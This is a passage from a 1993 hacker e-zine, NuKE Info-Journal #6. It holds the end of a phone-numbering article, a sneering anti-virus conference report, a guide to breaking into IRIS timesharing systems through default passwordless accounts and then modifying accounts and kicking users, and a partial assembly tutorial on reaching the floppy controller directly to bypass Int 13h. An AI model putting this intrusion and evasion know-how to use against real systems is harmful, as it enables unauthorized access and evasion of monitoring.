AT&T (ie. just dial 1-NPA-NXX-XXXX). Currently 950s are only used
in the U.S., but they are reserved for future use in Canada and
will probably soon be utilized, given the recent Unitel decision.
Currently Canadian callers must use local dialups for independent
long-distance carriers (called Feature Group A, long phased out in
the United States). (In the U.K. Mercury uses a similar setup.
Mercury phones are equiped to pulse dial 131, enter the customer's
ten-digit PIN touch-tone, then enter the number they're trying to
call, all automatically. This is sort of like 950 access...)
958 and 959
~~~~~~~~~~~
These exchanges are usually reserved for plant testing. In some
areas they may be used for normal service. In most areas other
exchanges are used for testing, too.
976
~~~
976 numbers are like local 1-900 numbers. They are billed on
a per-minute basis, but are usually much less expensive than 900
calls (not more than a dollar or two at most per minute). 976
can usually be blocked (like 900 numbers), sometimes for a fee.
In some areas the telephone company has other exchanges set aside
for 976-type usage; for instance in Pennsylvania the telco has
reserved the 556 exchange for this purpose, and in Texas 703 is
used. Sometimes these other exchanges must be specifically
requested by the customer to be dialed (in other words they default
to blocked).
844
~~~
The 844 exchange used to be used for time (it was TIme-4 under
the old exchange-name system), but the telephone companies figured
why give away this service for free when you can charge $0.50
via a 976 number. Now time is generally found at NPA-976-1616, and
the 844 exchange is available for normal usage. (Interesting note:
in the San Francisco Bay area [408, 415, 510, 707], you can get
the time by dialing "POPCORN", billed as a local call. In New York
and Boston, the number used to be "NERVOUS.")
936
~~~
Like 844, the 936 was once used for pre-recorded messages, only
936 was used for weather announcements (it was WEather-6 in the old
days). This, like time, has been moved to a 976 service in most
places, usually at NPA-976-1212 (and they throw in obnoxious ads to
boot!). Now 936 is usually just a normal exchange.
% Phone capacity %
~~~~~~~~~~~~~~~~~~
The original design of telephone numbers was: (NBX) NNX-XXXX. In
theory, this gives:
N B X N N X X X X X
8 * 2 * 10 * 8 * 8 * 10 * 10 * 10 * 10 * 10 = 1.024 billion numbers
However, as some area codes and exchanges are reserved for special
purposes (such as 411, 555 exchange, etc), the total possible number of
telephone numbers was somewhat less.
As the exchange codes in some area codes were used up, some central
offices started using the NXX format, where the middle digit can then be a
zero or one; this began in New York and Los Angeles and is now used in
almost every area code. Now, telephone numbers look like this:
(NBX) NXX-XXXX. This gives a potential of:
N B X N X X X X X X
8 * 2 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 1.28 billion numbers
However, codes like 411 and 611 would not be assigned because they
will still be needed for services such as directory assistance and repair.
Nevertheless, some unused N11 codes like 211 may be found in some area
codes as active exchanges. It's also not a good idea to assign the home
area code (or nearby area codes), as this could cause confusion.
Going from NNX exchange codes to NXX only represents a 25% increase in
the total theoretical amount of telephone numbers, and not all area code
regions are expected to run out of exchanges.
The ultimate goal is not only to use area codes for exchanges codes,
but to use exchanges codes for area codes also. This means that telephone
numbers will ultimately look like this: (NXX) NXX-XXXX. This gives a
potential of:
N X X N X X X X X X
8 * 10 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 6.4 billion numbers
With a five-fold increase in the number of possible area codes, there
should be plenty of room to grow for some time.
% Placing calls %
~~~~~~~~~~~~~~~~~
Basically, all calls within an area code will ultimately be dialed in
one of the following ways: 1) dial seven digits; 2) dial one plus home
area code plus the local number; or 3) dial one plus the seven digit number
within area code, then wait for a few seconds to time out. One alternative
not mentioned in official documents (for touch tone phones) is to use one
plus seven digit number in home area code then pressing the pound key, with
the pound key terminating the dialing (as in international dialing).
- "1+" is generally used for direct-dialed long distance calls within
North America, especially calls outside the local area code.
Sometimes intra-LATA calls must be dialed 1-NXX-XXX or even
1-NPA-NXX-XXXX if they're outside your local calling area. Yep,
unlike almost all of the rest of the world, World Zone One uses 1 for
DDD calls instead of the internationally-standard 0.
- "0+" is used to dial operator-assisted or automated credit card calls
within North America. After 0 + (area code) + number are dialed, a
prompt tone (same tones as a dial tone, but for a very short duration)
will be issued, then one of the following actions will be taken:
1) wait for a few seconds, then an operator will come on line; 2) dial
"0" to get the operator immediately (for a collect or person-to-person
call, etc.); or 3) dial the telephone company credit card number for
billing purposes. It is unclear what will happen in the cases of
automated collect calls, as to what kinds of dialing would be standard
in that case. In my area, a computer voice system prompts you for
your name, then dials the number and says "You have a collect call
from [your three-second message]. Press one to accept the charges or
two to reject the call" (or something very close to that). Of course,
this system is open to abuse: probably the most collect calls are
made from a Mr./Ms. "Call me back at NXX-XXXX", etc... Also, this
system is only used for local calls.
- Dialing "0" and waiting will get the local area operator.
- "00" is used in the U.S. to get the operator for a default long
distance carrier. This is used as most long distance companies have
their own operators. A single "0" digit will call up the local
operator (with the local telephone company as opposed to the long
distance company).
- "01" is used for overseas calls. "01+" indicates an operator-assisted
or automatic credit card call, while "011+" indicates a direct-dialed
overseas call. "010+" is reserved for some unspecified future use.
- "10XXX+" is used in the U.S. to indicate which long distance carrier
to use in a situation known as "equal access." This allows a
telephone subscriber to select a long distance company for a
particular call. For instance, "10288+" gets AT&T (288 is ATT...),
while "10222+" gets MCI and "10333+" selects U.S. Sprint. After this
code, a 1 or 0 is dialed (to indicate direct dial or operator-assisted
call), then the number to be called. With this system you can place
a call via another carrier if they offer lower rates, etc. for that
particular call. You get a separate bill in a month or two.
10000 is not available for assignment.
10001 - 10099 are reserved for restricted purposes.
10100 - 10199 are reserved for international carriers.
10200 - 10999 are assigned to standard long distance carriers.
Canada doesn't have to worry about this code yet, though given the
recent changes in long-distance regulation, it's likely that they will
adopt a U.S.-style system soon.
- "11+" is reserved for special calling services like call-waiting
functions, etc. For instance, "1170" is used to disable the
call-waiting. The asterisk or "star" key ("*") can be used instead
of the "11" prefix on touch-tone phones. The current special calling
codes on many local telephone systems are:
*57 - call tracing request (some systems use this for call back)
*60 - call blocking activated
*61 - priority ring activated
*63 - select call forwarding activated
*66 - repeat dialing activated
*67 - call number ID blocking (must be dialed before each call)
*69 - call return activated
*70 - disable call waiting
*71 - three-way calling according to usage
*72 - enable call forwarding
*73 - disable call forwarding
*74 - modify speed calling directory entry (for 8 # service)
*75 - modify speed calling directory entry (for 30 # service)
*76 - call pickup
*79 - ring again
*80 - call blocking disabled
*81 - priority ring disabled
*83 - select call forwarding activated
*86 - repeat dialing disabled
*89 - call return disabled
% International dialing %
~~~~~~~~~~~~~~~~~~~~~~~~~
International Direct Distance Dialing (011+/01+ dialing) began in 1970
between New York and London, and has since become available in all service
areas in North America. Over 99% of the world's telephones are reachable
from the United States and Canada. According to AT&T, the only areas
which require operator assitance to reach are: Afghanistan, Burma, Cuba,
Easter Island, Laos, Niue, Norfolk Island, Somalia, Spanish Sahara, Sudan,
Tuvalu, Vanatu, Wallis and Futuna, and Yemen. From Canada, calls can
direct-dialed to Cuba and Burma (the U.S. government doesn't permit any
calls to there, even though the capability exists). North Korea cannot
be dialed at all, period, even with an operator; not only do they have a
primitive phone system and are politically shunned, they also just changed
everyone's phone number, so no one can dial in and spread evil Capitalist
propaganda. (There are no phone books in North Korea -- that's classified
information. Seriously.)
As you can see, most of the non-direct-dialable numbers are small
Pacific islands; these calls aren't direct-dialable because the only trunks
to these countries are generally to Australia or other Pacific countries,
and AT&T is only allowed to use the trunks for an hour or two each day.
Other countries just have phone systems in such awful condition that they
can't be dialed easily (Laos, Sudan, etc.), while Cuba and Burma are banned
in the U.S. for political reasons. Within a few years, the capability to
direct-dial all telephones in the world should exist. Already IDDD exists
to certain research bases in Antarctica, Mongolia, and other places you'd
never even *want* to call. It's only a matter of time, now...
% The future of World Zone One %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
On January 1, 1995 all telephone systems are expected to change their
equipment over to allow for new "interchangeable" area codes (area codes
whose second digits are not one or zero). This date was originally to be
July 1, 1995 but was moved up to January because of increasing demand for
phone numbers due to fax, modem, and cellular phones.
The initial set of new area codes will take the form NN0, or those
numbers ending in zero. This means that areas codes that do not have
exchanges ending in zero (or only a few NN0 exchanges that could be
renumbered) can still be able to tell the difference between an exchange
and an area code by looking at the first three digits. The new NN0-type
area codes will be assigned starting with these first few codes (in order):
260, 480, 520, 590, 650, 220, 250, 490, 660, 680, 720, 730, 850, and 940.
The 970 NPA will be reserved for phone testing purposes, and will not
become and area code. New area codes may be assigned as follows:
geographic codes will use N2X and N3X, N4X through N7X will be used for
expansion, and N8X and N9X will be used for non-geographic codes. (In this
notation N represents a digit from 2 to 9, and X represents any digit.)
Thus, area codes like 223, 734, or 520 would be geographic codes under the
proposal, while area codes like 987, 294, or 780 would be non-geographic
(like 700/800/900 numbers are now). This middle digit of the area code is
referred to as the "B" digit, thus the B digit indicates a new geographic
or non-geographic code. As the initial set of geographic or non-geographic
codes are used up, expansion takes place by using the nearest available
expansion set. Thus, N4X codes are next in line for geographic codes
expansion, while N7X codes are next for non-geographic expansion.
Ultimately, expansion to more digits will be needed in the distant future,
and it is proposed that either the N5X or N6X codes can be used to provide
for "expansion" codes to set up a numbering plan of more than ten digits.
In addition to the new area codes, the Carrier Identification Code
format of 10XXX+ will be expanded to 101XXXX+ in the near future, because
nearly all of the 10XXX codes are assigned at this time.
On December 31, 1996 (referred to as "Time T"), there will be an
expansion of the maximum international number length from twelve digits to
fifteen digits, according to a CCITT recommendation. Already one country
has moved to fourteen digit numbers, and more such plans are likely in the
future; in order to continue to permit direct dialing to such countries,
the maximum number of digits allowed for IDD calls must be increased to at
least fifteen.
Also, it has been recommended that the North American phone system
evolve to ten-digit dialing for station-to-station (network based) calls,
including local calls. The idea is to start in the metropolitan areas
using "overlay" NPA codes like New York and perhaps other areas soon. It
is also proposed that 1+ be eliminated as a long-distance access prefix; in
other words, any call in North America would consist of ten digits, whether
local, long distance, or to an 800/900-type service. In effect, everyone
will have a ten-digit phone number, instead of a seven-digit phone number
and a three-digit area code, as under the current plan.
Who will get the first interchangeable area code? No one knows for
certain, but by observing number of exchanges in each area we can make some
educated guesses. Alabama (205) and Arizona (602) both will need new NPAs
very soon, as will 206 (western Washington), 703 (Houston area) and [gasp!]
708 (suburban Chicago). One of these five areas will almost certainly get
the first code. Some claim it will be 708... An Illinois Bell operator
denies this (but remember, this is an IBT operator here, not someone who
knows what they're talking about). There is also a rumour that the next
split will occur somewhere in Florida, though this seems unlikely as none
of Florida's NPAs are running out of numbers and other areas need them much
more urgently. Only time will tell.
% Conclusion %
~~~~~~~~~~~~~~
Well folks, I hope this information has been of use to you. The
telephone system can be a fascinating thing (and I'm not just talking about
phreaking here), and I encourage you to learn more on your own. Also, look
for more articles about the world telecommunications network in future NuKE
InfoJournals. I'd also like to take the time to give credit where credit
is due: some of the information in this article was gleaned from the
comp.dcom.telecom newsgroup on the Usenet and the Telecom Digest archives
at lcs.mit.edu, with other bits coaxed from IBT and AT&T operators,
borrowed from other text files, and written from personal knowledge and
outside research. Enjoy, everyone.
Nowhere Man/NuKE
===============================================================================
�===============================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "National Computer Security Association (NCSA) -N
E- Cover Report" Nu
-N uK
Nu By KE
uK Throbbing Grisle E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% NCSA San Francisco Conference January 1993 %
Yes, that's right, I got in at the National Computer Security Association's
Conference pertaining to computer security in general and viruses in
particular. Thanks goes out to my University professor for giving me his
unwanted complimentary tickets (way to go, Les!). Since I was on semester
break, I called my friend C.K. and we were off, to what is affectionately
known in the bay area as, "The City."
This would not be that big of deal, except that the list of speakers reads
like a who's who of the anti-viral industry. We started off with a
lecture by the Man himself, Mr. John McAfee.
What can we say about this guy? Well, we noticed that John is like the
Hugh Hefner of the AV (AntiVirus) world. He comes in very well dressed,
very confident, and can get away with saying the most inaccurate pieces
of crap and the crowd eats it up like its ice cream! At one point in his
lecture, John stated that the Dir II virus "infects the FAT". Huh?!?!
Tell the truth, John. You ain't no programmer. When was the last time you
typed in "#include <stdio.h>"? Bet you never have.
But the ironic thing about the whole show is that there are guys there who
know way more about viruses, even have better products out on the market, but
who aren't nearly as successful. Does that mean there was McAfee bashing
going on? Naw...no resentment here! [NOT]
The next lecture C.K. and I went to ,a long and greasy brunch, was
David Stang. "David Who?" you might ask? Well, I never heard of him before
either, but he claims to have started the NCSA (wow - what an accomplishment)
and then left it (left or kicked out?) but comes back to give lectures
(no hard feelings, right?) Well, anyway, he was there to sell his Virus
Analysis Machine, which consisted of the same ol' bait files, a little bit
of checking (where is the code placed??), and then it runs the file through
Sourcer. I would have thought he could have written his own disassembler, one
specifically for viruses. We decided that it would not even be worth pirating.
You can bet the other programmers in the audience thought the same thing.
Well, we decided to wrap up the days festivities (before going out into the
San Francisco night to party) by attending Alan Soloman's lecture. He is
the good doctor from Doctor Soloman's Anti-Virus Tool Kit. This guy is the
kind of Brit that would extract a fee from the US and Canada for using the
English Language. Tight? You probably couldn't get dental floss through his
`arsehole.' He gets up there waving his arm, making snide comments about
everybody and everything (with side implications to McAfee; I get the feeling
these two would not make good roommates). Then he talks about CARO, being the
`Saviour of the world.'
CARO, from what I could gather from the conference, is a group of virus
researcher that happens to include Alan Soloman and Fridrik Skulason (maker
of F-Prot AntiVirus). The way these guys talk about their group, I though I
was listening to a YAM conference! They really think their group has made a
Difference and they are the only protectors against viruses that matter. I
turned to a very attractive girl who was sitting nearby (must have been from
Marketing) and asked, "Is McAfee part of CARO?", to which she rolled her
eyes and said, "Are you kidding? They hate each other."
With these amazing memories etched in our minds, we wandered out into the
harsh city for a night of over-indulgence. So much so, we couldn't get up
the next day until noon (well, we _were_ on semester break!) We made it up
for the middle of someone's else's lecture (I can't remember whom it was -
he had an accent and spoke about how to disassemble viruses. Did I learn
anything? Did I care?)
Okay, we found that boring enough so we went to the exhibit. Did you know
people are still working on hardware solutions for viruses? The girl was
pretty cute at the booth, so I became overly interested in their shitty
product, asking questions like "Gee, so I wouldn't need any updates?"
"Oh no, not with our product", she purred. Yeah, Right.
Then we went to a panel discussion where the Good Dr. Soloman, and three
other guys were talking about the teenage personality distortion patterns
of the virus writer/hacker. Nothing new here. We're all suicidal virgins,
y'know. (Even though many of use are married with kids, and I presume the
rest did pass their puberty stage. Come on, where you getting this info?)
The last seminar was given by Fridrik Skulason. This guy is all the way
from Iceland. (Iceland? They have computers up there? Better yet, `When
did they learn to type?') If Soloman is the Arch Enemy of McAfee, Skulason
would have been McAfee in an anti-matter universe. What the hell does that
mean? It means that McAfee is dark, tall and slim. Fridrik is pale, blond
and puggy. McAfee is an effective speaker (Imposing his Reign of Error);
Fridrik is quiet. I mean _real_ quiet. C.K. wanted to set the guy on fire
just to see if he could let out a loud yell. John McAfee has Charisma!
Fridrik has facts and knows what the hell he is talking about. (Big Deal? huh?)
So here is what I could conclude from the conference;
a) AntiVirus is a big business, McAfee still is the heavyweight champ, but
there are a lot of contenders out there that want to knock out the chump,
er, champ. However, there is a fallout coming, where only the strong will
survive. It is not a time or place for a company to start any more; XTREE's
resent failure was sited as an example of that.
b) The AntiVirus would is much more `clickish' than I would have thought. Kind
of reminds me of high school. Some people won't talk to others. Amusing.
c) The AntiVirus world is scared. The sheer of new viruses is increasing
exponentially, overtaking some scanners. VCL was mentioned, as well as
MPC as the new trend that threatens the AV developer. A fall out is
predicted in this business.
Any last parting shots? You Bet!
David Stang: Have you ever thought of selling real estate?
Fridrik Skulason: Try charging a little more for F-Prot and take a vacation;
you need the sun.
John McAfee: Keep making VIRUSHAM, but sock the money away. Your days are
numbered.
Throbbing Grisle
================================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Interactive Realtime Information Service (IRIS) -N
E- Guide" Nu
-N uK
Nu By KE
uK Ned239 E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% IRIS R9.1.3A Introduction %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hello Everybody, I would like to know what has happened to the hacking world.
Now it's basically dead, at least in most areas I know of. I hope to change
that. Anyways, Here is some info on a relatively old System called IRIS or
Interactive Realtime Information Service. This system was originally meant
to run on older systems like PDP-8 and PDP-11. Due to the versatile nature
of IRIS, today a lot more systems run it. IRIS systems usually can be reached
at 1200 7E1 and after pressing either ESCape or Enter a few times, you should
see something like this as a greet:
-=-
Welcome to "IRIS" R9.1.3A timesharing !
ACCOUNT ID ?
-=-
Or sometimes it will say what you have reached under the welcome line. IRIS
is also extremely hacker-friendly as it will let you type account names for
as long as you want. Also when you guess an account there are no passwords on
them. At first you will not see what you type, to change this type Control-E
to turn the echo on. Try CAPSLOCK also.
-=-
DEFAULT ACCOUNTS
----------------
MANAGER (Good System Access)
NO NAME (Normal User)
DEMO (Try the other ones first)
PDP8 /
PDP11 < == All General Accounts
SOFTWARE \
Hopefully you're in there with one of those accounts. Now, then you will get
a # prompt. If you are on with an account of access level 3, then you will
be able to use a user maintanencer program, by typing either ACCOUNTS or
ACCOUNT UTILITY. You should get:
-=-
(0) EXIT TO SYSTEM
(1) ADD NEW ACCOUNT
(2) MODIFY ACCOUNT
(3) DELETE ACCOUNT
(4) INQUIRE ACCOUNT
(5) LIST THE ACCOUNTS
Ah, I wasn't able to create an account, but I did modify several. Basically
this is pretty straight forward.
-=-
Ok, after you're done playing with the accounts and exit properly there are
a lot of interesting features on this IRIS. On one particular system that I
use often you have several utilities such as spreadsheets, word processors
and even an ASM program. You can get a list of all the things to do by typing
LIBR at the # prompt. most of the filenames you type the response will be
"NOT A PROCESSOR", Since most of the IRIS software was written is business
BASIC. Type BASIC LOAD <Filename>. Here are some of the most interesting
programs.
PP or PORT ALL MONITOR will let you see who else is using the system. if
for some reason you want to kick off a user, type PPP and then the user name.
Also if you want to see your own status type PROT.STAT
If you need help with something try typing GUIDE and it will give you a short
menu of all the help files available. Too bad there usually isn't many.
Another interesting utility to use is BLOCKCOPY, since I am not completely
used to it, I will show you what the guide said:
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
ENTER TOPIC # 1
INTRODUCTORY COMMENTS ON USING BLOCKCOPY
PRINT HERE OR $LPT (C/R OR $) :
INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY
INTRODUCTION
BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT
FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF
ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER.
BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY
USEFUL IN SPECIAL CASES. EXAMPLES:
1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER,
WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE
DESTINATION.
2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE
DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL
UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN
BE SET ASIDE AS A DEDICATED SYSTEM BACKUP.
3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED
UP TO AND RESTORED FROM OTHER STORAGE MODULES.
PRESS RETURN WHEN READY TO GO ON
LIMITATIONS
NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER
TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER
IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS.
ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH
PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK.
SETUP
FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK.
NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE
FOR THE BZUD POINTER.
ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU.
FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING
YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR
DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE
AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER.
PRESS RETURN WHEN READY TO GO ON
NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED.
ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL.
ENTER THE FOLLOWING VALUES FOR THE SOURCE:
ADDRESS OF THE SOURCE BZUD : 0
COMPUTED VALUE OF SOURCE PHYU : 0
STARTING CYLINDER NUMBER : 0
BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0)
THIS IS NORMALY ZERO : 0
SOURCE CONTROLLER'S DEVICE CODE : 0
SOURCE DISC'S LRC : 0
NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0
ENTER THE FOLLOWING VALUES FOR THE DESTINATION:
ADDRESS OF THE DESTINATION BZUD : 0
COMPUTED VALUE OF DESTINATION PHYU : 0
STARTING CYLINDER : 0
BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0
DESTINATION CONTROLLER'S DEVICE CODE : 0
PRINT HERE OR $LPT (C/R OR $) : 0
RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND:
#SHUTDOWN <CTRL-E>[PASSWORD]<CTRL-E> BLOCKCOPY @73000,X73000
USE DBUG TO SET UP THE FOLLOWING LOCATIONS:
200 : 0
201 : 0
202 : 0
203 : 0
204 : 0
205 : 0
206 : 0
207 : 0
210 : 0
211 : 0
212 : 0
213 : 176346
PRESS RETURN WHEN READY TO GO ON 0
THEN J410 (OR RESET & START AT 410) TO START THE COPY
RULES FOR BLOCKCOPY:
ADDRESS FUNCTION
400 BAD HALT
401 NOT USED
402 NOT USED
410 START COPY
411 START VERIFY
412 START DISC PATTERN GENERATOR
413 START DISC PATTERN VERIFICATION
414 RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS
415 SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST
416 START INFINITE DISC PATTERN TEST
PRESS CR TO CONTINUE DISPLAY OF RULES
HALTS:
63077 INDICATES A SUCCESSFUL COMPLETION
63377 WRONG VALUE(S) IN TABLE STARTING AT 200
67077 READ ERROR
73077 WRITE ERROR
63277 VERIFY ERROR IN CORE COMPARE
ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS:
260 = CURRENT SOURCE RDA
261 = CURRENT DEST RDA
262 = CURRENT DISC STATUS
NO AUTOMATIC RETRIES ARE DONE.
ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE)
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
-=-
Also you can edit individual text files and configuration files
by text editors. The names of this shit is different on all the systems
I've called.
-=-
%CONCULSION
I hope this serves a useful purpose.. I still can't understand why IRIS is
extremely easy to use, and very common.. yet, I haven't seen any good
articles on it in a very long time.
================================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Programming the NEC765 Floppy Disk Controller, -N
E- and the DMA Chip to bypass the Int 13h Nu
-N uK
Nu By KE
uK Dr. X E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% The Challenge %
~~~~~~~~~~~~~~~~~
The challenge was started by Dr. X in order to try to access the disk media
without using any DOS or Bios Interrupt 13h calls. Surely a _very_ difficult
challenge indeed, nevertheless Dr. X has succeeded in doing so, and he will
explain the theory behind his development. This scholar does deserve a
`pat on the back' for his brain teaser work. Good work Dr. X, and welcome
aboard.
NuKE Members/Supporters
% Programming the Floppy Disk Controller & DMA chip to bypass the Int 13h %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The NEC 765 floppy disk controller chip controls floppy disk drives motors
and heads. And it manages the flow of data to and from the disk sector(s).
The FDC (Floppy Disk Controller) performs 15 operations in all, of which
only three are discussed here. They are Seek, Read and Write.
The FDC operates in three phases:
1) The command phase
2) The execution phase
3) The result phase
a) The command phase : When one or more bytes are sent to the Data Registers
b) The execution phase: When the FDC undertake the command
c) The result phase : A number of status byte(s) are read from the Data
Register(s)
% I) The Ports %
The FDC is operated through only three I/O (Input/Output) ports:
3F2 - Digital Output Port
3F4 - Status Register
3F5 - Data Register
1. Digital Output Port (3F2)
Bits Function
1-0 Drive # ; 00=A, 01=B, 10=C, 11=D
2 0=Reset the floppy disk controller (***)
3 1=Enable FDC interrupt and DMA access
7-4 1=Turn ON drive motors D to A (bit 4 = drive A)
Warning: This register is WRITE ONLY
(***) Do not set bit 2 to 0 at any time (recelebrate)
2. Data Register (3F5)
Operation Byte # Function
Seek 1 Code number (Fh)
2 Head & Drive : 00000HDD (h=head, DD=drive)
Read Sector 1 Code number (66h)
2 Head & Drive : 00000HDD (h=head, DD=drive)
3 Track number
4 Head number
5 Sector number
6 Bytes in sector (2=512)
7 End of track (09)
8 GAP Length
9 Data Length
Write Sector 1 Code number (45h)
2-9 Same as READ SECTOR (above)
Warning: You must be sure that the FDC is ready before you send or read a
a byte from the data register. Bits 7-6 of the status register
provide this information.
3. Status Register (3F4)
Bits Function
3-0 1=Disk drive D-A in Seek Mode
4 1=FDC read or write command in progress
5 1=FDC is not in DMA mode
6 1=FDC data register is ready to send data
0=FDC data register is ready to receive data
7 1=FDC ready to send or receive data
Warning: When a seek operation is complete, the FDC invokes a INT 6h
(the disk interrupt). When the interrupt occurs, the BIOS
interrupt handler sets the bit 7 of the seek status byte in
the BIOS Data Area located at 0:043E. This is the sole result of
the interrupt.
% II) Initializing %
Before initializing a channel, the program must send a code to the chip
telling it whether it is reading from or writing to the Floppy Disk
Controller. This one byte code is 46h for reading and 4Ah for writing.
The code must be sent to each of two separate port addresses: 0E & 0C.
After that, you can send the parameters to the Data Register (3F5),
following the bellow steps:
1. Turn on the floppy disk (enable interrupts with a SLI first)
a) Out the code byte to the Digital Output Register (3F2)
b) Send 46h to read or 4Ah to write to each of two separate port
addresses 0B and 0Ch
(eg: Out 0B,46h
Out 0C,46h)
2. Then you _must_ perform a seek operation to the concerned Head
and Track;
a) Out the code for Seek operation (0F) to the FDC (3F5)
b) Out head & Drive code (00000HDDxB, H=head,DD=drive)
c) Out the track number
d) Wait for Int 6h
3. After that you can perform the read or write operation(s):
a) Calculate the address of the buffer (see the program at the end
of this Article)
b) Send the address to the DMA
c) Out the value 66h for read or 45h for write to the FDC (3F5)
d) Out the Head & Drive number
e) Out the Track number
f) Out the Head number
g) Out the Sector number
h) Out the Sector Code; get this information with INT 21h
i) Out End-of-Track ; with AX=1E35h
j) Out the GAP length
k) Out the data length
l) Wait for INT 6h
m) Perform 7 INs from the Data Register (3F5) to get the status bytes.
(Refer to Part III)
4. Finally, turn off the motor(s):
a) Out the code byte to the Digital Output Register (3F2)
% III) The Status Bytes %
After a read or write operation the FDC gives you 7 status bytes:
Byte # Function
1 Status Byte 0
2 Status Byte 1
3 Status Byte 2
4 Track number
5 Head number
6 Sector number
7 Byte per sector code (0-3)
1. Status Byte 0
Bit # Function
7-6 00=normal termination
01=execution began, could not complete
10=invalid command
11=failed because disk drive went offline
5 1=seek operation in progress
4 1=disk drive fault
3 1=disk drive not ready
2 number of selected head
1-0 number of selected drive
2. Status Byte 1
Bit # Function
7 1=requested sector beyond last sector number
6 always 0
5 1=data transfer error
4 1=data overrun
3 always 0
2 1=cannot read or find sector
1 1=cannot write because of write protection tab
0 1=missing address mark in disk format
3. Status Byte 2
Bit # Function
7 always 0
6 1=encountered delete-data address mark
5 1=CRC error in data
4 1=track identification problem
3 1=scan command condition satisfied
2 1=scan command condition NOT satisfied
1 1=bad track
0 1=missing address mark
% IV) Read Procedure in ASM (for A86 assembler) %
Jmp TheCode
Buffer Db 512 dup (0) ; For the sector
StatusBuffer Db 7 Dup (7) ; For the status bytes
TheCode Proc Near
ReadSector:
; Turn ON the Motor
Sti
Mov Dx,03F2H
Mov Al,00101101xB ; Set the Bits 0 , 2 ,3 , 4
Out Dx,Al
; Wait for motor to come to speed (1/2 second)
Call Motor_Delay
Mov Cx,2000
Loop $
; Begin the initialization of DMA Chip
Mov Al,46H ; Code for Read Datas
Out 11,Al ; Send Datas
Out 12,Al
; Now , Calculate buffer address
Lea Ax,Buffer ;
